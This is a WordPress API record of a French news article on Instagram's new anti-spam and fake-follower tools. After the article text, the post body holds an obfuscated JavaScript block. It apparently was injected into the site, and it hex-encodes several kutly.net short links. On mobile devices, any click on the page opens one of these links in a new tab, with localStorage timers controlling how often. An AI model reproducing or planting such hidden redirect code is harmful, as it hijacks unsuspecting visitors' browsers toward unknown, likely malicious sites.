{"id":14843,"date":"2023-12-14T13:37:54","date_gmt":"2023-12-14T11:37:54","guid":{"rendered":"https:\/\/lapressedefrance.fr\/news\/?p=14843"},"modified":"2023-12-14T13:37:55","modified_gmt":"2023-12-14T11:37:55","slug":"instagram-facilite-le-retrait-des-abonnes-indesirables-avec-de-nouveaux-outils-antispam","status":"publish","type":"post","link":"https:\/\/lapressedefrance.fr\/news\/instagram-facilite-le-retrait-des-abonnes-indesirables-avec-de-nouveaux-outils-antispam\/","title":{"rendered":"Instagram Facilite le Retrait des Abonn\u00e9s Ind\u00e9sirables avec de Nouveaux Outils Antispam"},"content":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Instagram Facilite le Retrait des Abonn\u00e9s Ind\u00e9sirables avec de Nouveaux Outils Antispam\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>\n<p class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color has-medium-font-size wp-elements-fd7dfb937060f706f051920ad7858464\">Meta d\u00e9ploie une s\u00e9rie de nouveaux outils sur Instagram offrant aux utilisateurs un meilleur contr\u00f4le sur la pr\u00e9sence de contenus ind\u00e9sirables et de bots dans leurs fils d&#8217;actualit\u00e9. Ces outils, introduits progressivement au cours des prochaines semaines, permettent \u00e9galement d&#8217;informer les utilisateurs si leurs publications respectent les directives de la communaut\u00e9.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"420\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1.jpg\" alt=\"\" class=\"wp-image-14844\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1.jpg 800w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1-600x315.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1-200x105.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1-768x403.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1-110x58.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1-420x221.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/12\/Instagram-Likes-800x420-1-770x404.jpg 770w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\"><strong>D\u00e9tection Am\u00e9lior\u00e9e du Spam :<\/strong><br>Instagram a perfectionn\u00e9 son syst\u00e8me automatis\u00e9 de d\u00e9tection du spam, couvrant les commentaires, les tags, les vues des stories et les abonn\u00e9s. Les syst\u00e8mes de mod\u00e9ration signaleront les faux abonn\u00e9s et le contenu satur\u00e9 de spam, offrant aux utilisateurs la possibilit\u00e9 de supprimer ces \u00e9l\u00e9ments en masse pour gagner du temps. Tout compte suspect\u00e9 de spam ou de bot sera filtr\u00e9 dans une bo\u00eete de r\u00e9ception s\u00e9par\u00e9e pour examen. Si un compte est jug\u00e9 non spam, l&#8217;utilisateur peut approuver la demande, les ajoutant ainsi \u00e0 sa liste d&#8217;abonnements. Dans le cas contraire, tous les comptes seront automatiquement supprim\u00e9s apr\u00e8s 30 jours. Les publications de profils marqu\u00e9s comme spam n&#8217;appara\u00eetront pas sur le compte du cr\u00e9ateur de contenu, sauf s&#8217;ils sont approuv\u00e9s. Les titulaires de compte peuvent afficher, supprimer en masse ou approuver toutes les demandes de tag signal\u00e9es par le syst\u00e8me.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Notifications pour Contenu Violant les Directives :<\/strong><br>Instagram enverra des notifications dans l&#8217;application en cas de d\u00e9tection de publications violant ses politiques de contenu. Cette initiative fait suite \u00e0 la r\u00e9cente mise \u00e0 jour d&#8217;Instagram indiquant quand des publications sont bloqu\u00e9es de l&#8217;apparition sur la page Explore, visant \u00e0 emp\u00eacher les utilisateurs de r\u00e9p\u00e9ter ces erreurs. Pour les Stories, Instagram exp\u00e9rimente encore la possibilit\u00e9 de masquer les vues provenant de comptes consid\u00e9r\u00e9s comme du spam.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Filtrage des Commentaires :<\/strong><br>En compl\u00e9ment, Instagram, qui avait d\u00e9j\u00e0 introduit l&#8217;outil &#8220;Mots Cach\u00e9s&#8221; en 2021, masquant les messages avec des mots-cl\u00e9s douteux, pr\u00e9voit d&#8217;affiner la d\u00e9tection du spam gr\u00e2ce \u00e0 l&#8217;outil avanc\u00e9 de filtrage des commentaires.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Conciliation entre Lutte contre le Spam et Libert\u00e9 d&#8217;Expression :<\/strong><br>Instagram, confront\u00e9 depuis longtemps aux probl\u00e8mes de harc\u00e8lement et de spam, cherche \u00e0 \u00e9quilibrer la lutte contre les contenus inappropri\u00e9s tout en permettant un \u00e9change d&#8217;id\u00e9es libre sur sa plateforme.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Ces nouveaux outils antispam d&#8217;Instagram repr\u00e9sentent un pas significatif vers un environnement en ligne plus sain et s\u00e9curis\u00e9. L&#8217;accent mis sur la d\u00e9tection automatis\u00e9e et la possibilit\u00e9 pour les utilisateurs de contr\u00f4ler activement leur liste d&#8217;abonn\u00e9s contribuera \u00e0 am\u00e9liorer l&#8217;exp\u00e9rience globale des utilisateurs d&#8217;Instagram.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x41\\x68\\x56\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x66\\x70\\x4e\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x68\\x78\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x43\\x4e\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x45\\x44\\x36\\x63\\x356','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x76\\x63\\x38\\x63\\x368','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x6e\\x43\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x5a\\x68\\x31\\x63\\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4b\\x50\\x51\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4b\\x43\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><div class=\"pvc_clear\"><\/div><p class=\"pvc_stats all \" data-element-id=\"14843\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;1,267&nbsp;total views, &nbsp;1&nbsp;views today<\/p><div class=\"pvc_clear\"><\/div><div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Instagram Facilite le Retrait des Abonn\u00e9s Ind\u00e9sirables avec de Nouveaux Outils Antispam\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"excerpt":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Instagram Facilite le Retrait des Abonn\u00e9s Ind\u00e9sirables avec de Nouveaux Outils Antispam\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div><p>Meta d\u00e9ploie une s\u00e9rie de nouveaux outils sur Instagram offrant aux utilisateurs un meilleur contr\u00f4le sur la pr\u00e9sence de contenus ind\u00e9sirables et de bots dans leurs fils d&#8217;actualit\u00e9. Ces outils, introduits progressivement au cours des prochaines semaines, permettent \u00e9galement d&#8217;informer les utilisateurs si leurs publications respectent les directives de la communaut\u00e9. D\u00e9tection Am\u00e9lior\u00e9e du Spam [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p class=\"pvc_stats all \" data-element-id=\"14843\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;1,267&nbsp;total views, &nbsp;1&nbsp;views today<\/p>\n<div class=\"pvc_clear\"><\/div>\n<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Instagram Facilite le Retrait des Abonn\u00e9s Ind\u00e9sirables avec de Nouveaux Outils Antispam\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"author":1,"featured_media":14844,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2242],"tags":[],"class_list":["post-14843","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-divers"],"_links":{"self":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14843"}],"collection":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/comments?post=14843"}],"version-history":[{"count":0,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14843\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media\/14844"}],"wp:attachment":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media?parent=14843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/categories?post=14843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/tags?post=14843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}